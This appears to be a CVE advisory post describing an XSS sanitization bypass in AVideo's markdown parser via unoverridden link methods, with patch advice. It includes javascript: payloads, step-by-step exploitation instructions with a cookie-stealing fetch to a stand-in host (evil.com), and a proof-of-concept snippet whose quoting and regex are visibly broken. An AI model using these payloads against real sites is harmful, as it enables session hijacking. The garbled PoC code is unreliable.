AVideo, XSS Bypass, CVE-2026-33500 (Critical)

Listen to this Post

The CVE-2026-33500 vulnerability arises from an incomplete fix for XSS in AVideo’s `ParsedownSafeWithLinks` class. This class extends the base Parsedown markdown parser and was intended to sanitize raw HTML by overriding `blockMarkup()` (blocks non-<a>/<img> tags) and `inlineMarkup()` (sanitizes `href` and `src` attributes with a whitelist). However, the base `Parsedown.php` contains two additional methods that generate anchor tags: `inlineLink()` (handles markdown `[text](url)` syntax) and `inlineUrlTag()` (handles auto-links like <url>). Because `ParsedownSafeWithLinks` does not override these two methods, any markdown link or auto-link bypasses the sanitization entirely. An attacker can supply a payload such as [Click me](javascript:alert(document.cookie)), which gets passed directly to inlineLink(). That method constructs an HTML anchor: `Click me` without checking the protocol. The same applies to `` via inlineUrlTag(). The vulnerable code exists in `objects/functionsSecurity.php` (commit pre-3ae02fa24093). The base Parsedown library (vendor/erusev/parsedown/Parsedown.php) implements the unsafe methods. Since the AVideo class only overrides raw HTML handling, the markdown-native link syntax remains unpatched, allowing javascript:, data:, or `vbscript:` URIs to execute arbitrary script in the victim’s browser.

dailycve form:

Platform: AVideo platform
Version: Before commit 3ae02fa
Vulnerability: XSS sanitization bypass
Severity: Critical
date: April 14 2026

Prediction: Patch expected April2026

What Undercode Say:

Clone vulnerable version (commit before fix)
git clone https://github.com/WWBN/AVideo /tmp/AVideo_test
cd /tmp/AVideo_test && git checkout 3ae02fa240939dbefc5949d64f05790fd25d728d~1
Run PoC script (poc.py)
python3 poc.py
poc.py snippet simulating inlineLink bypass
import re
payload = "<a href="javascript:alert(document.cookie)">Click me</a>"
match = re.match(r'[([^]])](([^)]+))', payload)
if match:
text, href = match.group(1), match.group(2)
print(f'<a href="{href}">{text}</a>') unsafe output

how Exploit:

  1. Find any user input field that uses `ParsedownSafeWithLinks` (comments, video descriptions, channel bio).
  2. Insert markdown link: [Hijack](javascript:fetch('https://evil.com/steal?c='+document.cookie)).
  3. Submit content. No sanitization blocks the `javascript:` protocol.
  4. When another user clicks the link, the JS executes in their session, leaking cookies or performing actions on their behalf.

Protection from this CVE

Override `inlineLink()` and `inlineUrlTag()` in `ParsedownSafeWithLinks` to apply the same protocol whitelist as `inlineMarkup()` (allow only https?://, mailto:, /, “). Reject any javascript:, data:, or `vbscript:` URIs. Update to commit `3ae02fa24093` or later.

Impact

Attacker can inject arbitrary JavaScript via markdown links in any user-generated content. Victims clicking the link suffer session hijacking, account takeover, theft of sensitive data, or unauthorized actions performed in their context.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top